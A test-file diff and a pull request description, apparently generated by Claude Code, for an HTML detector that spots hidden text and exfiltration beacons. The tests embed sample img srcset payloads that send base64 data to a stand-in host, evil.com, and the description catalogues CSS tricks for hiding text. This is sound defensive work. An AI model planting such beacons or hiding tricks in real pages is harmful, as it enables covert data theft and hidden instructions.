+      `<img srcset="https://ok.com/a.png (foo,bar), https://evil.com/b.png?data=${b64} 2x">`,
+    );
+    assert.equal(threat.isImage, true);
+    assert.equal(threat.target, "evil.com");
+  });
+  it("handles a bare srcset candidate (URL then comma, no descriptor)", () => {
+    // First candidate's URL run ends in a comma (no descriptor); the second is
+    // the exfil beacon.
+    const threat = onlyThreat(
+      `<img srcset="https://ok.com/a.png, https://evil.com/b.png?data=${b64} 2x">`,
+    );
+    assert.equal(threat.target, "evil.com");
+  });
+  it("keeps a srcset URL that itself contains commas intact (no split shredding)", () => {
+    const threat = onlyThreat(
+      `<img srcset="https://evil.com/b.png?a=1,2&data=${b64} 2x">`,
+    );
     assert.equal(threat.target, "evil.com");
   });
   it("flags an exfil ping attribute on an anchor", () =>


### PR DESCRIPTION
Detection/transform-layer precision and recall fixes for `src/html.mjs`, all confirmed against the current code. Every precision fix fails **open** (treats ambiguous input as visible/benign) and is paired with a negative corpus asserting **zero** false splices/reports; the existing hidden vectors still splice with byte-exact surrounding preservation.

## Findings fixed

**H1 — `color:transparent` over-splices gradient-clipped headings.** `color:transparent` now fails open when the glyphs are painted by `background-clip:text` / `-webkit-background-clip:text`, or when `-webkit-text-fill-color` is a concrete non-transparent color (the standard gradient-heading recipe). A plain transparent color with no such paint is still hidden.

**H2 — `clip-path:inset()` only inspected the first value.** `inset(50% 0 0 0)` left the bottom half visible but read as hidden. `inset()` now hides only when **all four** resolved edges collapse (each a percentage ≥50%, after CSS 1–4-value shorthand expansion, `round <radius>` suffix dropped). `circle(0)` is unchanged.

**H3 — same-color hide fired through an image layer.** `background:#fff url(dark.png)` + `color:#fff` read as white-on-white hidden. The `background` shorthand color is now ignored (fail open) when the shorthand carries a `url(...)`, gradient, or `image-set(...)` layer — the image can make same-colored text readable, and if it fails to load the element's own background shows through. An explicit `background-color` still compares.

**H4 — credential-in-URL fired on benign path-like values.** `?redirect=/authorization-service/session/…abcdefghij1234567890` matched the `authorization` keyword in one place and a 20-char run in another. The secret-shape + digit test now must match on the **same contiguous opaque `[A-Za-z0-9_]{20,}` run**, so `ghp_…`-style tokens still fire while separator-split prose is dropped.

**H5 — one rehype parse per `<!`/`<?` candidate.** `bogusCommentEnd` is replaced by `commentSpans`, which tokenizes the value **once** and reads every bogus-comment span from that tree (keyed on start offset). Proper `<!--…-->` comments keep their linear `indexOf` fast path; the tree is built lazily only when a bogus candidate is actually encountered.

**H6 — `srcset`/`ping` `split(",")` shredded URLs with commas.** `srcset` is now parsed per the WHATWG "parse a srcset attribute" grammar: a candidate's URL is a non-whitespace run, so a `data:` URI (or a query with `,`) survives intact; commas only separate candidates when they trail the URL run or follow the paren-aware descriptor. `ping` (an array from rehype) is unchanged.

**H7 — `canonicalizeColor` missed CSS Color 4 forms.** Extended to space-separated rgb (`rgb(255 255 255)`), percentage channels (`rgb(100% 100% 100%)`), the `/`-alpha and legacy 4th-channel alpha forms (a literal-zero alpha canonicalizes to `transparent`), and `hsl()`/`hsla()` (angle units deg/grad/rad/turn, bare-number s/l). Still gated by `isConcreteColor`; anything unresolvable returns the raw token (fail open).

## Test findings fixed

**T5 — exfil-property vacuity was per-run, not per-placement.** The host-no-leak property now tracks flagged counts per `where` (query / fragment / path / userinfo) and asserts each placement flags ≥1, so an entire placement silently ceasing to flag can no longer pass vacuously.

**T9 — hidden corpus asserted only canary absence.** Each hidden vector now also asserts its adjacent visible framing bytes survive the splice (sentinel frames wrap the `hidden()` helper on their own paragraphs so the element keeps its original flow-HTML parse path; custom vectors carry an explicit `keep`), with a non-empty guard so the framing check can't go vacuous.

## Invariant negative corpus added
- `visible`: gradient-clipped heading, `-webkit-text-fill-color` visible fill, same-color over a `url()`/gradient background, `clip-path:inset(50% 0 0 0)` and a one-open-edge inset, white-on-white via `hsl()`.
- `urlBenign`: `authorization`-word redirect path, `token`-word prose path.
- `exfil`: a `srcset` `data:` URI whose commas previously shredded detection.

## Decisions made
- **`black-on-black-shorthand` moved from the `hidden` corpus to `visible`.** It pinned `background:rgb(0,0,0) url(x)` + `color:#000` as hidden; under H3 an image-layer background can't be proven to be the backdrop, so it now correctly fails open. The `isHiddenStyle` unit case `color:white;background:#fff url(x) no-repeat` was flipped `true → false` for the same reason. Alternative (keep flagging): would re-introduce the H3 false positive that splices readable text over an image.
- **H2 threshold is "every edge is a percentage ≥50%"**, which is *stricter* than the true geometric collapse (top+bottom ≥100% **or** left+right ≥100%). Chosen for precision per the doctrine — it can only false-negative on an asymmetric full collapse like `inset(0 0 100% 0)`, never false-positive on a partially-visible box. Alternative (exact geometry): adds recall on rare asymmetric clips at the cost of edge-case false splices.
- **H5 parses the whole value in one pass**, which is context-sensitive where a slice was not: a `<!` inside a rawtext element (`<style>`) is now (correctly) *not* a comment. This is strictly more faithful to the browser; no corpus vector depended on the old slice behavior.

## Validation
`prettier --check`, `eslint`, `tsc --noEmit`, and `c8 --check-coverage node --test` all pass — 1475 tests, 100% coverage on `html.mjs`.

---
_Generated by [Claude Code](https://claude.ai/code/session_018ZSXDUnuc5tDxi2Q7o7CLS)_